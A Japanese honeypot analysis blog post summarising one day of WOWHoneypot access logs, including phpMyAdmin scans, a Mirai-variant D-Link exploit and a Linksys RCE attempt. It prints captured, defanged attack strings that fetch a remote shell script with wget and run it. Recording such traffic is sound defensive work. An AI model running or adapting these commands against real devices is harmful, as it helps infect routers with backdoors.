S-Owl

S(ecurity)Owl

WOWHoneypot簡易分析(22日目)

WOWhoneypotの2018/6/25(月)(運用22日目)の簡易分析です。

本日の総アクセス件数は170件です。

 83 [2018-06-25 "HEAD /
43 [2018-06-25 "GET /
2 [2018-06-25 "GET /web/phpMyAdmin/index.php
2 [2018-06-25 "GET /pmamy/index.php
2 [2018-06-25 "GET /pmamy2/index.php
2 [2018-06-25 "GET /PMA/index.php
2 [2018-06-25 "GET /pma/index.php
2 [2018-06-25 "GET /PMA2/index.php
2 [2018-06-25 "GET /phpMyAdmin/index.php
2 [2018-06-25 "GET /phpmyadmin/index.php
2 [2018-06-25 "GET /mysql/index.php
2 [2018-06-25 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
2 [2018-06-25 "GET /index.php
2 [2018-06-25 "GET /db/index.php
2 [2018-06-25 "GET /dbadmin/index.php
2 [2018-06-25 "GET /admin/PMA/index.php
2 [2018-06-25 "GET /admin/pma/index.php
2 [2018-06-25 "GET /admin/phpMyAdmin/index.php
2 [2018-06-25 "GET /admin/phpmyadmin2/index.php
2 [2018-06-25 "GET /admin/mysql/index.php
2 [2018-06-25 "GET /admin/mysql2/index.php
1 [2018-06-25 "POST /hndUnblock.cgi
1 [2018-06-25 "GET /x
1 [2018-06-25 "GET /webfig/roteros.info
1 [2018-06-25 "GET /hndUnblock.cgi
1 [2018-06-25 "GET /admin/phpmyadmin/index.php
1 [2018-06-25 "GET /admin/index.php

phpMyAdmin関連と/を除外します。

2 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 GET /x
1 GET /hndUnblock.cgi
1 POST /hndUnblock.cgi
1 GET /webfig/roteros.info

シンプルになりました。

既知のものは上から、
ルータD-Linkの脆弱性を攻撃するMirai亜種、
iOSの脱獄アプリによるスキャン行為
と思われます。

赤字のものですが、以前にも来ていましたが、ちゃんと確認したところ、LinksysのルータのRCEの脆弱性を突く調査行為と攻撃の一貫として同じIPから3つのアクセスがともに来ていました。

GET /hndUnblock.cgi
POST /hndUnblock.cgi
GET /webfig/roteros.info

このうちのPOSTの攻撃コードをデコードすると以下になります。

cd /tmp;rm -f nmlt1.sh;wget -O nmlt1.sh hxxp://domstates[.]su/nmlt1.sh;chmod +x nmlt1.sh;./nmlt1.sh`&StartEPI=1

6/5にも同様に調査しており、バックドアダウンローダをインストールするシェルスクリプトのようです。

https://www.hybrid-analysis.com/sample/82adfbffe47a48f1f14f9460759d22c0ce381bba8029635b3297544b1ef04e12/5a8b3cf27ca3e177502a1ad3

 

本日のハンティングログは以下です。Mirai亜種とLinksysの脆弱性を突くものでした。

2 [2018-06-25 wget hxxp://185.62.190[.]191/r
1 [2018-06-25 wget -O nmlt1.sh hxxp://domstates[.]su/nmlt1.sh

以上です。